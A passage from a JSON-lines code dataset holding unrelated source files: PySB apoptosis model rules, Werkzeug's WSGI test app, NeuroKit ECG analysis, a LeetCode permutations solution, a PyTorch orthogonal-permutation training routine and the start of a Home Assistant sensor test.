BaxA_1=3, BaxA_2=4, SmacM=5, CytoCM=None) % SmacM(BaxA=5) >> BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, SmacM=None, CytoCM=None) + SmacC(Xiap=None), transport_1_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_1kc)\nRule('transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C', BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, SmacM=None, CytoCM=None) + CytoCM(BaxA=None) | BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, SmacM=None, CytoCM=5) % CytoCM(BaxA=5), transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_2kf, transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_1kr)\nRule('transport_1_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C', BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, SmacM=None, CytoCM=5) % CytoCM(BaxA=5) >> BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, SmacM=None, CytoCM=None) + CytoCC(), transport_1_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_1kc)\nRule('catalysis_0_C8A_catalyzer_C3pro_substrate_C3A_product', C8A(BidU=None, C3pro=None) + C3pro(Apop=None, C8A=None) | C8A(BidU=None, C3pro=1) % C3pro(Apop=None, C8A=1), catalysis_0_C8A_catalyzer_C3pro_substrate_C3A_product_2kf, catalysis_0_C8A_catalyzer_C3pro_substrate_C3A_product_1kr)\nRule('catalysis_1_C8A_catalyzer_C3pro_substrate_C3A_product', C8A(BidU=None, C3pro=1) % C3pro(Apop=None, C8A=1) >> C8A(BidU=None, C3pro=None) + C3A(Xiap=None, ParpU=None, C6pro=None), catalysis_1_C8A_catalyzer_C3pro_substrate_C3A_product_1kc)\nRule('catalysis_0_C3A_catalyzer_C6pro_substrate_C6A_product', C3A(Xiap=None, ParpU=None, C6pro=None) + C6pro(C3A=None) | C3A(Xiap=None, ParpU=None, C6pro=1) % C6pro(C3A=1), catalysis_0_C3A_catalyzer_C6pro_substrate_C6A_product_2kf, catalysis_0_C3A_catalyzer_C6pro_substrate_C6A_product_1kr)\nRule('catalysis_1_C3A_catalyzer_C6pro_substrate_C6A_product', C3A(Xiap=None, ParpU=None, C6pro=1) % C6pro(C3A=1) >> C3A(Xiap=None, ParpU=None, C6pro=None) + C6A(C8pro=None), catalysis_1_C3A_catalyzer_C6pro_substrate_C6A_product_1kc)\nRule('catalysis_0_C6A_catalyzer_C8pro_substrate_C8A_product', C6A(C8pro=None) + C8pro(Fadd=None, C6A=None) | C6A(C8pro=1) % C8pro(Fadd=None, C6A=1), catalysis_0_C6A_catalyzer_C8pro_substrate_C8A_product_2kf, catalysis_0_C6A_catalyzer_C8pro_substrate_C8A_product_1kr)\nRule('catalysis_1_C6A_catalyzer_C8pro_substrate_C8A_product', C6A(C8pro=1) % C8pro(Fadd=None, C6A=1) >> C6A(C8pro=None) + C8A(BidU=None, C3pro=None), catalysis_1_C6A_catalyzer_C8pro_substrate_C8A_product_1kc)\n\nInitial(Ligand(Receptor=None), Ligand_0)\nInitial(ParpU(C3A=None), ParpU_0)\nInitial(C8A(BidU=None, C3pro=None), C8A_0)\nInitial(SmacM(BaxA=None), SmacM_0)\nInitial(BaxM(BidM=None, BaxA=None), BaxM_0)\nInitial(Apop(C3pro=None, Xiap=None), Apop_0)\nInitial(Fadd(Receptor=None, C8pro=None), Fadd_0)\nInitial(SmacC(Xiap=None), SmacC_0)\nInitial(ParpC(), ParpC_0)\nInitial(Xiap(SmacC=None, Apop=None, C3A=None), Xiap_0)\nInitial(C9(), C9_0)\nInitial(C3ub(), C3ub_0)\nInitial(C8pro(Fadd=None, C6A=None), C8pro_0)\nInitial(C6A(C8pro=None), C6A_0)\nInitial(C3pro(Apop=None, C8A=None), C3pro_0)\nInitial(CytoCM(BaxA=None), CytoCM_0)\nInitial(CytoCC(), CytoCC_0)\nInitial(BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None), BaxA_0)\nInitial(ApafI(), ApafI_0)\nInitial(BidU(C8A=None), BidU_0)\nInitial(BidT(), BidT_0)\nInitial(C3A(Xiap=None, ParpU=None, C6pro=None), C3A_0)\nInitial(ApafA(), ApafA_0)\nInitial(BidM(BaxM=None), BidM_0)\nInitial(Receptor(Ligand=None, Fadd=None), Receptor_0)\nInitial(C6pro(C3A=None), C6pro_0)\n\n"} {"ext": "py", "sha": "1a2ebb1ee6774e2758c167ef110d7e7763063c69", "content": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\ndef main():\n \"\"\"Lists as piles\n \"\"\"\n\n # Create a stack\n my_stack = [1, 2, 3, 4]\n print(\"my_stack\", my_stack)\n\n # Push values on the stack\n my_stack.append(5)\n my_stack.append(6)\n my_stack.append(7)\n print(\"my_stack\", my_stack)\n\n # Pop values from the stack\n print(\"Poped value\", my_stack.pop())\n print(\"my_stack\", my_stack)\n print(\"Poped value\", my_stack.pop())\n print(\"my_stack\", my_stack)\n print(\"Poped value\", my_stack.pop())\n print(\"my_stack\", my_stack)\n print(\"Poped value\", my_stack.pop())\n print(\"my_stack\", my_stack)\n\n\nif __name__ == '__main__':\n main()\n"} {"ext": "py", "sha": "1a2ebbf26fdd2ee9721467b2ee844ef820c2732a", "content": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\n werkzeug.testapp\r\n ~~~~~~~~~~~~~~~~\r\n\r\n Provide a small test application that can be used to test a WSGI server\r\n and check it for WSGI compliance.\r\n\r\n :copyright: (c) 2013 by the Werkzeug Team, see AUTHORS for more details.\r\n :license: BSD, see LICENSE for more details.\r\n\"\"\"\r\nimport os\r\nimport sys\r\nimport werkzeug\r\nfrom textwrap import wrap\r\nfrom werkzeug.wrappers import BaseRequest as Request, BaseResponse as Response\r\nfrom werkzeug.utils import escape\r\nimport base64\r\n\r\nlogo = Response(base64.b64decode(\r\n'''R0lGODlhoACgAOMIAAEDACwpAEpCAGdgAJaKAM28AOnVAP3rAP/////////\r\n//////////////////////yH5BAEKAAgALAAAAACgAKAAAAT+EMlJq704680R+F0ojmRpnuj0rWnrv\r\nnB8rbRs33gu0bzu/0AObxgsGn3D5HHJbCUFyqZ0ukkSDlAidctNFg7gbI9LZlrBaHGtzAae0eloe25\r\n7w9EDOX2fst/xenyCIn5/gFqDiVVDV4aGeYiKkhSFjnCQY5OTlZaXgZp8nJ2ekaB0SQOjqphrpnOiq\r\nncEn65UsLGytLVmQ6m4sQazpbtLqL/HwpnER8bHyLrLOc3Oz8PRONPU1crXN9na263dMt/g4SzjMeX\r\nm5yDpLqgG7OzJ4u8lT/P69ej3JPn69kHzN2OIAHkB9RUYSFCFQYQJFTIkCDBiwoXWGnowaLEjRm7+G\r\np9A7Hhx4rUkAUaSLJlxHMqVMD/aSycSZkyTplCqtGnRAM5NQ1Ly5OmzZc6gO4d6DGAUKA+hSocWYAo\r\nSlM6oUWX2O/o0KdaVU5vuSQLAa0ADwQgMEMB2AIECZhVSnTno6spgbtXmHcBUrQACcc2FrTrWS8wAf\r\n78cMFBgwIBgbN+qvTt3ayikRBk7BoyGAGABAdYyfdzRQGV3l4coxrqQ84GpUBmrdR3xNIDUPAKDBSA\r\nADIGDhhqTZIWaDcrVX8EsbNzbkvCOxG8bN5w8ly9H8jyTJHC6DFndQydbguh2e/ctZJFXRxMAqqPVA\r\ntQH5E64SPr1f0zz7sQYjAHg0In+JQ11+N2B0XXBeeYZgBZFx4tqBToiTCPv0YBgQv8JqA6BEf6RhXx\r\nw1ENhRBnWV8ctEX4Ul2zc3aVGcQNC2KElyTDYyYUWvShdjDyMOGMuFjqnII45aogPhz/CodUHFwaDx\r\nlTgsaOjNyhGWJQd+lFoAGk8ObghI0kawg+EV5blH3dr+digkYuAGSaQZFHFz2P/cTaLmhF52QeSb45\r\nJwxd+uSVGHlqOZpOeJpCFZ5J+rkAkFjQ0N1tah7JJSZUFNsrkeJUJMIBi8jyaEKIhKPomnC91Uo+NB\r\nyyaJ5umnnpInIFh4t6ZSpGaAVmizqjpByDegYl8tPE0phCYrhcMWSv+uAqHfgH88ak5UXZmlKLVJhd\r\ndj78s1Fxnzo6yUCrV6rrDOkluG+QzCAUTbCwf9SrmMLzK6p+OPHx7DF+bsfMRq7Ec61Av9i6GLw23r\r\nidnZ+/OO0a99pbIrJkproCQMA17OPG6suq3cca5ruDfXCCDoS7BEdvmJn5otdqscn+uogRHHXs8cbh\r\nEIfYaDY1AkrC0cqwcZpnM6ludx72x0p7Fo/hZAcpJDjax0UdHavMKAbiKltMWCF3xxh9k25N/Viud8\r\nba78iCvUkt+V6BpwMlErmcgc502x+u1nSxJSJP9Mi52awD1V4yB/QHONsnU3L+A/zR4VL/indx/y64\r\ngqcj+qgTeweM86f0Qy1QVbvmWH1D9h+alqg254QD8HJXHvjQaGOqEqC22M54PcftZVKVSQG9jhkv7C\r\nJyTyDoAJfPdu8v7DRZAxsP/ky9MJ3OL36DJfCFPASC3/aXlfLOOON9vGZZHydGf8LnxYJuuVIbl83y\r\nAz5n/RPz07E+9+zw2A2ahz4HxHo9Kt79HTMx1Q7ma7zAzHgHqYH0SoZWyTuOLMiHwSfZDAQTn0ajk9\r\nYQqodnUYjByQZhZak9Wu4gYQsMyEpIOAOQKze8CmEF45KuAHTvIDOfHJNipwoHMuGHBnJElUoDmAyX\r\nc2Qm/R8Ah/iILCCJOEokGowdhDYc/yoL+vpRGwyVSCWFYZNljkhEirGXsalWcAgOdeAdoXcktF2udb\r\nqbUhjWyMQxYO01o6KYKOr6iK3fE4MaS+DsvBsGOBaMb0Y6IxADaJhFICaOLmiWTlDAnY1KzDG4ambL\r\ncWBA8mUzjJsN2KjSaSXGqMCVXYpYkj33mcIApyhQf6YqgeNAmNvuC0t4CsDbSshZJkCS1eNisKqlyG\r\ncF8G2JeiDX6tO6Mv0SmjCa3MFb0bJaGPMU0X7c8XcpvMaOQmCajwSeY9G0WqbBmKv34DsMIEztU6Y2\r\nKiDlFdt6jnCSqx7Dmt6XnqSKaFFHNO5+FmODxMCWBEaco77lNDGXBM0ECYB/+s7nKFdwSF5hgXumQe\r\nEZ7amRg39RHy3zIjyRCykQh8Zo2iviRKyTDn/zx6EefptJj2Cw+Ep2FSc01U5ry4KLPYsTyWnVGnvb\r\nUpyGlhjBUljyjHhWpf8OFaXwhp9O4T1gU9UeyPPa8A2l0p1kNqPXEVRm1AOs1oAGZU596t6SOR2mcB\r\nOco1srWtkaVrMUzIErrKri85keKqRQYX9VX0/eAUK1hrSu6HMEX3Qh2sCh0q0D2CtnUqS4hj62sE/z\r\naDs2Sg7MBS6xnQeooc2R2tC9YrKpEi9pLXfYXp20tDCpSP8rKlrD4axprb9u1Df5hSbz9QU0cRpfgn\r\nkiIzwKucd0wsEHlLpe5yHXuc6FrNelOl7pY2+11kTWx7VpRu97dXA3DO1vbkhcb4zyvERYajQgAADs\r\n='''), mimetype='image/png')\r\n\r\n\r\nTEMPLATE = u'''\\\r\n\r\nWSGI Information\r\n\r\n
\r\n \"[The\r\n

WSGI Information

\r\n

\r\n This page displays all available information about the WSGI server and\r\n the underlying Python interpreter.\r\n

Python Interpreter

\r\n \r\n \r\n \r\n \r\n \r\n \r\n
Python Version\r\n %(python_version)s\r\n
Platform\r\n %(platform)s [%(os)s]\r\n
API Version\r\n %(api_version)s\r\n
Byteorder\r\n %(byteorder)s\r\n
Werkzeug Version\r\n %(werkzeug_version)s\r\n
\r\n

WSGI Environment

\r\n %(wsgi_env)s
\r\n

Installed Eggs

\r\n

\r\n The following python packages were installed on the system as\r\n Python eggs:\r\n

    %(python_eggs)s
\r\n

System Path

\r\n

\r\n The following paths are the current contents of the load path. The\r\n following entries are looked up for Python packages. Note that not\r\n all items in this path are folders. Gray and underlined items are\r\n entries pointing to invalid resources or used by custom import hooks\r\n such as the zip importer.\r\n

\r\n Items with a bright background were expanded for display from a relative\r\n path. If you encounter such paths in the output you might want to check\r\n your setup as relative paths are usually problematic in multithreaded\r\n environments.\r\n

    %(sys_path)s
\r\n
\r\n'''\r\n\r\n\r\ndef iter_sys_path():\r\n if os.name == 'posix':\r\n def strip(x):\r\n prefix = os.path.expanduser('~')\r\n if x.startswith(prefix):\r\n x = '~' + x[len(prefix):]\r\n return x\r\n else:\r\n strip = lambda x: x\r\n\r\n cwd = os.path.abspath(os.getcwd())\r\n for item in sys.path:\r\n path = os.path.join(cwd, item or os.path.curdir)\r\n yield strip(os.path.normpath(path)), \\\r\n not os.path.isdir(path), path != item\r\n\r\n\r\ndef render_testapp(req):\r\n try:\r\n import pkg_resources\r\n except ImportError:\r\n eggs = ()\r\n else:\r\n eggs = sorted(pkg_resources.working_set,\r\n key=lambda x: x.project_name.lower())\r\n python_eggs = []\r\n for egg in eggs:\r\n try:\r\n version = egg.version\r\n except (ValueError, AttributeError):\r\n version = 'unknown'\r\n python_eggs.append('
  • %s [%s]' % (\r\n escape(egg.project_name),\r\n escape(version)\r\n ))\r\n\r\n wsgi_env = []\r\n sorted_environ = sorted(req.environ.items(),\r\n key=lambda x: repr(x[0]).lower())\r\n for key, value in sorted_environ:\r\n wsgi_env.append('%s%s' % (\r\n escape(str(key)),\r\n ' '.join(wrap(escape(repr(value))))\r\n ))\r\n\r\n sys_path = []\r\n for item, virtual, expanded in iter_sys_path():\r\n class_ = []\r\n if virtual:\r\n class_.append('virtual')\r\n if expanded:\r\n class_.append('exp')\r\n sys_path.append('%s' % (\r\n class_ and ' class=\"%s\"' % ' '.join(class_) or '',\r\n escape(item)\r\n ))\r\n\r\n return (TEMPLATE % {\r\n 'python_version': '
    '.join(escape(sys.version).splitlines()),\r\n 'platform': escape(sys.platform),\r\n 'os': escape(os.name),\r\n 'api_version': sys.api_version,\r\n 'byteorder': sys.byteorder,\r\n 'werkzeug_version': werkzeug.__version__,\r\n 'python_eggs': '\\n'.join(python_eggs),\r\n 'wsgi_env': '\\n'.join(wsgi_env),\r\n 'sys_path': '\\n'.join(sys_path)\r\n }).encode('utf-8')\r\n\r\n\r\ndef test_app(environ, start_response):\r\n \"\"\"Simple test application that dumps the environment. You can use\r\n it to check if Werkzeug is working properly:\r\n\r\n .. sourcecode:: pycon\r\n\r\n >>> from werkzeug.serving import run_simple\r\n >>> from werkzeug.testapp import test_app\r\n >>> run_simple('localhost', 3000, test_app)\r\n * Running on http://localhost:3000/\r\n\r\n The application displays important information from the WSGI environment,\r\n the Python interpreter and the installed libraries.\r\n \"\"\"\r\n req = Request(environ, populate_request=False)\r\n if req.args.get('resource') == 'logo':\r\n response = logo\r\n else:\r\n response = Response(render_testapp(req), mimetype='text/html')\r\n return response(environ, start_response)\r\n\r\n\r\nif __name__ == '__main__':\r\n from werkzeug.serving import run_simple\r\n run_simple('localhost', 5000, test_app, use_reloader=True)\r\n"} {"ext": "py", "sha": "1a2ebd20ec2a87b1412881182523065a77696950", "content": "# -*- coding: utf-8 -*-\nimport pandas as pd\n\nfrom .ecg_eventrelated import ecg_eventrelated\nfrom .ecg_intervalrelated import ecg_intervalrelated\n\n\ndef ecg_analyze(data, sampling_rate=1000, method=\"auto\"):\n \"\"\"Performs ECG analysis on either epochs (event-related\n analysis) or on longer periods of data such as resting-state data.\n\n Parameters\n ----------\n data : dict, DataFrame\n A dictionary of epochs, containing one DataFrame per epoch,\n usually obtained via `epochs_create()`, or a DataFrame\n containing all epochs, usually obtained via `epochs_to_df()`.\n Can also take a DataFrame of processed signals from\n a longer period of data, typically generated by `ecg_process()`\n or `bio_process()`. Can also take a dict containing sets of\n separate periods of data.\n sampling_rate : int\n The sampling frequency of the signal (in Hz, i.e., samples/second).\n Defaults to 1000Hz.\n method : str\n Can be one of 'event-related' for event-related analysis on epochs,\n or 'interval-related' for analysis on longer periods of data. Defaults\n to 'auto' where the right method will be chosen based on the\n mean duration of the data ('event-related' for duration under 10s).\n\n Returns\n -------\n DataFrame\n A dataframe containing the analyzed ECG features. If\n event-related analysis is conducted, each epoch is indicated\n by the `Label` column. See `ecg_eventrelated()` and\n `ecg_intervalrelated()` docstrings for details.\n\n See Also\n --------\n bio_process, ecg_process, epochs_create, ecg_eventrelated, ecg_intervalrelated\n\n Examples\n ----------\n >>> import neurokit2 as nk\n >>>\n >>> # Example 1: Download the data for event-related analysis\n >>> data = nk.data(\"bio_eventrelated_100hz\")\n >>>\n >>> # Process the data for event-related analysis\n >>> df, info = nk.bio_process(ecg=data[\"ECG\"], sampling_rate=100)\n >>> events = nk.events_find(data[\"Photosensor\"],\n threshold_keep='below',\n event_conditions=[\"Negative\",\n \"Neutral\",\n \"Neutral\",\n \"Negative\"])\n >>> epochs = nk.epochs_create(df, events,\n sampling_rate=100,\n epochs_start=-0.1, epochs_end=1.9)\n >>> nk.ecg_analyze(epochs, sampling_rate=100)\n >>>\n >>> # Example 2: Download the resting-state data\n >>> data = nk.data(\"bio_resting_5min_100hz\")\n >>>\n >>> # Process the data\n >>> df, info = nk.ecg_process(data[\"ECG\"], sampling_rate=100)\n >>>\n >>> # Analyze\n >>> nk.ecg_analyze(df, sampling_rate=100)\n \"\"\"\n method = method.lower()\n\n # Event-related analysis\n if method in [\"event-related\", \"event\", \"epoch\"]:\n # Sanity checks\n if isinstance(data, dict):\n for i in data:\n colnames = data[i].columns.values\n elif isinstance(data, pd.DataFrame):\n colnames = data.columns.values\n\n if len([i for i in colnames if \"Label\" in i]) == 0:\n raise ValueError(\"NeuroKit error: ecg_analyze(): Wrong input\"\n \"or method, we couldn't extract\"\n \"extract epochs features.\")\n else:\n features = ecg_eventrelated(data)\n\n # Interval-related analysis\n elif method in [\"interval-related\", \"interval\", \"resting-state\"]:\n features = ecg_intervalrelated(data)\n\n # Auto\n elif method in [\"auto\"]:\n\n if isinstance(data, dict):\n for i in data:\n duration = len(data[i]) / sampling_rate\n if duration >= 10:\n features = ecg_intervalrelated(data)\n else:\n features = ecg_eventrelated(data)\n\n if isinstance(data, pd.DataFrame):\n if 'Label' in data.columns:\n epoch_len = data['Label'].value_counts()[0]\n duration = epoch_len / sampling_rate\n else:\n duration = len(data) / sampling_rate\n if duration >= 10:\n features = ecg_intervalrelated(data)\n else:\n features = ecg_eventrelated(data)\n\n return features\n"} {"ext": "py", "sha": "1a2ebe466abdbcf87500cf2d6c85c05e718b5ac7", "content": "# Q6\nI = (dt_true['income'] < 0.5)\ndt_true.loc[I, ['consumption']] = 0.5\ndt_true['consumption'].mean()"} {"ext": "py", "sha": "1a2ebe723752bd9e0fe6cb791a4bad866178fe19", "content": "# 47. Permutations II\n\nclass Solution:\n def permuteUnique(self, nums: List[int]) -> List[List[int]]:\n \"\"\"\n Given a collection of numbers that might contain duplicates, return all possible unique permutations.\n \"\"\"\n permutations = set()\n self.helper(nums, [], permutations)\n return permutations\n \n def helper(self, array, currentPermutation, permutations):\n if not len(array) and len(currentPermutation):\n permutations.add(tuple(currentPermutation))\n else:\n for index in range(len(array)):\n newArray = array[: index] + array[index + 1:]\n newPermutation = currentPermutation + [array[index]]\n self.helper(newArray, newPermutation, permutations)\n"} {"ext": "py", "sha": "1a2ec0438436e70f3f58ef493bca2cccbd7f42d3", "content": "import torch\nimport numpy as np\n\n\ndef train_perm_orth(train_loader, model, optimizer, scheduler, criterion, regularizer=None, rho=1E-4, delta=0.5,\n nu=1E-2, eps=1E-3, tau=1E-2, lagrange_pen=1E-2, perm_flag=True, t_step=40):\n if perm_flag:\n tau_min = 1E-24\n tau_max = 1E-1\n c = None\n lam_lm = []\n for p in optimizer.param_groups[0]['params']:\n lam_lm.append(torch.zeros_like(p))\n\n k_iter = 0\n ts = torch.empty(len(train_loader), device=model.device).uniform_(0.0, 1.0)\n with torch.no_grad():\n for p in optimizer.param_groups[0]['params']:\n p.data = torch.rand_like(p.data)\n p.data, _, _ = torch.svd(p.data)\n input_cml = []\n target_cml = []\n t_cml = []\n inner_iter = 0\n loss = 0.0\n loss_obj = 0.0\n for iter, (input, target) in enumerate(train_loader):\n t = ts[iter]\n input = input.to(model.device, non_blocking=False)\n target = target.to(model.device, non_blocking=False)\n output = model(input, perm_train=True, t=t)\n input_all = input\n target_all = target\n\n new_loss = criterion(output, target_all)\n loss_obj += new_loss\n\n # This part is for the augmented Lagrangian method\n int_pen = integer_penalty(optimizer.param_groups[0]['params'], lam_lm, lagrange_pen)\n\n loss += new_loss + int_pen\n\n inner_iter += 1\n input_cml.append(input.clone())\n target_cml.append(target.clone())\n t_cml.append(t.clone())\n if inner_iter % t_step == 0:\n optimizer.zero_grad()\n loss.backward()\n grad_norm = 0.0\n violator = 0.0\n for p in optimizer.param_groups[0]['params']:\n param_norm = p.grad.data.norm(2)\n grad_norm += param_norm.item() ** 2\n violator += torch.sum((torch.matmul(p.data.t(), p.data) - torch.eye(p.data.shape[0],\n device=p.device)) ** 2)\n grad_norm = grad_norm ** (1. / 2)\n\n if c is None:\n c = loss.clone().item()\n q_opt = 1\n loss_inner = loss.clone()\n print('Iteration: %03d, Loss %.2E, Objective %.2E, Negative Penalty: %.2E,'\n 'Grad Norm: %.2E, Ortho Violation: %.2E, tau: %.2E' %\n (k_iter, loss_inner.item(), loss_obj.item(), int_pen.item(), grad_norm, violator.item(), tau))\n # Compute F for defining Y function\n F_list = []\n with torch.no_grad():\n for p in optimizer.param_groups[0]['params']:\n f = torch.matmul(p.grad.data, p.t().data) - torch.matmul(p.data, p.grad.t().data)\n F_list.append(f)\n # Store old parameters\n params_old = [None] * len(optimizer.param_groups[0]['params'])\n for idx, param in enumerate(optimizer.param_groups[0]['params']):\n params_old[idx] = param.clone()\n grads_old = [p.grad.data.clone() for p in optimizer.param_groups[0]['params']]\n\n # Compute the values of Y(tau) and Y'(tau), store them into the model\n Y_t, Y_ft_prime = compute_ytau(tau, F_list, optimizer.param_groups[0]['params'])\n for p, y_t in zip(optimizer.param_groups[0]['params'], Y_t):\n p.data = y_t.clone()\n loss_inner = 0.0\n for t_2, input_2, target_2 in zip(t_cml, input_cml, target_cml):\n output = model(input_2, perm_train=True, t=t_2)\n\n loss_inner += criterion(output, target_2)\n int_pen = integer_penalty(optimizer.param_groups[0]['params'], lam_lm, lagrange_pen)\n loss_inner += int_pen\n\n optimizer.zero_grad()\n loss_inner.backward()\n grads_new = [p.grad.data.clone() for p in optimizer.param_groups[0]['params']]\n\n with torch.no_grad():\n dF_dt = 0.0\n for g_new, y_ft_p in zip(grads_new, Y_ft_prime):\n df = g_new * (y_ft_p / torch.norm(y_ft_p.data))\n df = torch.sum(df)\n dF_dt += df.item()\n\n threshold_flag = True\n k_inner = 0\n while threshold_flag:\n with torch.no_grad():\n threshold = c + rho * tau * dF_dt\n if loss_inner.item() >= threshold:\n # Compute Y for smaller value of tau\n with torch.no_grad():\n tau *= delta\n Y_t, Y_ft_prime = compute_ytau(tau, F_list, optimizer.param_groups[0]['params'])\n for p, y_t in zip(optimizer.param_groups[0]['params'], Y_t):\n p.data = y_t.clone()\n\n loss_old = loss_inner.clone()\n loss_inner = 0.0\n for t_2, input_2, target_2 in zip(t_cml, input_cml, target_cml):\n output = model(input_2, perm_train=True, t=t_2)\n loss_inner += criterion(output, target_2)\n int_pen = integer_penalty(optimizer.param_groups[0]['params'], lam_lm, lagrange_pen)\n loss_inner += int_pen\n\n optimizer.zero_grad()\n loss_inner.backward()\n grads_new = [p.grad.data.clone() for p in optimizer.param_groups[0]['params']]\n\n k_inner += 1\n if (loss_inner.item() - loss_old.item()) / (1 + loss_old.item()) < 1E-5:\n threshold_flag = False\n else:\n threshold_flag = False\n\n with torch.no_grad():\n c = (nu * q_opt * c + loss_inner.item())\n q_opt = nu * q_opt + 1\n c = c / q_opt\n\n bb_num = 0.0\n bb_denom = 0.0\n yy_sum = 0.0\n for p_old, g_old, p_new, g_new in zip(params_old, grads_old, optimizer.param_groups[0]['params'],\n grads_new):\n s_bb = p_new - p_old\n y_bb = g_new - g_old\n bb_num += torch.sum(s_bb ** 2)\n bb_denom += torch.sum(s_bb * y_bb)\n yy_sum += torch.sum(y_bb ** 2)\n tau_bb = bb_num / torch.abs(bb_denom)\n tau_bb = tau_bb.item()\n tau_bb2 = torch.abs(bb_denom) / yy_sum\n tau_bb2 = tau_bb2.item()\n tau_bb = np.minimum(tau_bb, tau_bb2)\n tau = np.minimum(tau_bb, tau_max)\n tau = np.maximum(tau, tau_min)\n lam_lm, lagrange_pen = integer_penalty_update(optimizer.param_groups[0]['params'], lam_lm,\n lagrange_pen)\n\n loss_inner = 0.0\n for t_2, input_2, target_2 in zip(t_cml, input_cml, target_cml):\n output = model(input_2, perm_train=True, t=t_2)\n loss_obj = criterion(output, target_2)\n int_pen = integer_penalty(optimizer.param_groups[0]['params'], lam_lm, lagrange_pen)\n loss_inner += loss_obj + int_pen\n\n optimizer.zero_grad()\n loss_inner.backward()\n grads_new = [p.grad.data.clone() for p in optimizer.param_groups[0]['params']]\n\n grad_norm = 0.0\n for g_new in grads_new:\n gn = g_new.norm(2)\n grad_norm += gn.item() ** 2\n grad_norm = grad_norm ** (1. / 2)\n\n k_iter += 1\n input_cml = []\n target_cml = []\n t_cml = []\n loss = 0.0\n loss_obj = 0.0\n\n model.train()\n loss_sum = 0.0\n correct = 0.0\n\n change_P = np.nan\n\n params_before = [None] * len(optimizer.param_groups[0]['params'])\n if nu is not None:\n for idx, param in enumerate(optimizer.param_groups[0]['params']):\n params_before[idx] = param.clone().detach()\n\n optimizer.step()\n\n lr = scheduler.get_lr()[0]\n with torch.no_grad():\n for param, param_o in zip(optimizer.param_groups[0]['params'], params_old):\n param.data = 1 / (1 + lr / nu) * (param + lr / nu * param_o)\n\n output = model(input_all, perm_train=True)\n loss = criterion(output, target_all)\n if regularizer is not None:\n loss += regularizer(model)\n loss_sum += loss.item() * input.size(0)\n\n pred = output.data.argmax(1, keepdim=True)\n correct += pred.eq(target_all.data.view_as(pred)).sum().item()\n\n return {\n 'loss': loss_sum / len(train_loader.dataset),\n 'accuracy': correct * 100.0 / len(train_loader.dataset),\n 'change_perm': change_P\n }\n\n\ndef hard_int_penalty(p_list, pen=1E1):\n pen_loss = 0.0\n for p in p_list:\n p_mask = p.data * (p.data <= 0)\n pen_loss += pen * torch.sum(p_mask ** 2)\n return pen_loss\n\n\ndef integer_penalty(p_list, lam_list, mu):\n pen_loss = 0.0\n for p, lam in zip(p_list, lam_list):\n mask = (p - lam / mu) <= 0\n mask_alt = (p - lam / mu) > 0\n p_l = torch.sum((- lam * p + 0.5 * mu * (p ** 2)) * mask)\n p_l += torch.sum((-1/(2 * mu) * lam ** 2) * mask_alt)\n pen_loss += p_l\n return pen_loss\n\n\ndef integer_penalty_update(p_list, lam_list, mu):\n new_lam_list = []\n with torch.no_grad():\n for p, lam in zip(p_list, lam_list):\n upd = lam - mu * p\n new_lam_list.append(upd * (upd > 0))\n new_mu = mu * 1.01\n return new_lam_list, new_mu\n\n\ndef compute_ytau(tau, f_list, p_list):\n y_tau = []\n y_tau_prime = []\n for p, f in zip(p_list, f_list):\n eye = torch.eye(f.shape[0], device=f.device)\n qmat_inv = torch.inverse(eye + tau / 2 * f)\n y_ft = torch.matmul(qmat_inv, eye - tau / 2 * f)\n y_ft = torch.matmul(y_ft, p)\n y_ft_prime = - torch.matmul(qmat_inv, f)\n y_ft_prime = torch.matmul(y_ft_prime, (p + y_ft) / 2)\n\n y_tau.append(y_ft.clone())\n y_tau_prime.append(y_ft_prime.clone())\n return y_tau, y_tau_prime"} {"ext": "py", "sha": "1a2ec086e778aa964a840fc70cf9aae1d766560e", "content": "\"\"\"The test for the History Statistics sensor platform.\"\"\"\n# pylint: disable=protected-access\nfrom datetime import timedelta\nimport unittest\nfrom unittest.mock import patch\n\nfrom homeassistant.const import STATE_UNKNOWN\nfrom homeassistant.setup import setup_component\nfrom homeassistant.components.sensor.history_stats import HistoryStatsSensor\nimport homeassistant.core as ha\nfrom homeassistant.helpers.template import Template\nimport homeassistant.util.dt as dt_util\n\nfrom tests.common import init_recorder_component, get_test_home_assistant\n\n\nclass TestHistoryStatsSensor(unittest.TestCase):\n \"\"\"Test the History Statistics sensor.\"\"\"\n\n def setUp(self):\n \"\"\"Set up things to be run when tests are started.\"\"\"\n self.hass = get_test_home_assistant()\n\n def tearDown(self):\n \"\"\"Stop everything that was started.\"\"\"\n self.hass.stop()\n\n def test_setup(self):\n \"\"\"Test the history statistics sensor 